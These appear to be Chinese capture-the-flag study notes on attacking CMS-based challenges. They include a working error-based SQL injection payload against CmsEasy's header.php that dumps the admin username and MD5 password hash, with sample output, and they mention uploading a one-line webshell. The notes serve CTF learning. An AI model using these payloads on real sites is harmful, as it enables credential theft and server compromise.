CMS类型题目：
首先判断CMS类型，再查询该CMS曾经出现的漏洞，利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入；
或者上传一句话木马后使用菜刀连接，可能再连接数据库。

(1)CMSEASY类型
可用公开漏洞网站：https://www.seebug.org/appdir/CmsEasy
1.cmseasy 无限制报错注入
步骤：向http://*****/celive/live/header.php中添加POST参数，如下：
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT//GROUP_CONCAT(username,password) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--
结果：可以爆出用户名及密码（md5加密）
例：XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
改进：XPATH显示的位数可能不够，所以改进POST参数，如下：
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT//GROUP_CONCAT(username,password)+from+yesercms_user),7,39),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–+
解释：可见之前是1-32位，现在是7-39位，用户名是admin,该错误还会有一位’['占位，则密码的md5应该是6-39
第一次：XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
第二次：XPATH syntax error: ‘[f512d4240cbbdeafada404677ccbe61’
所以密码md5为：ff512d4240cbbdeafada404677ccbe61

(2)齐博CMS类型
可用公开漏洞网站：https://www.2cto.com/article/201501/365742.html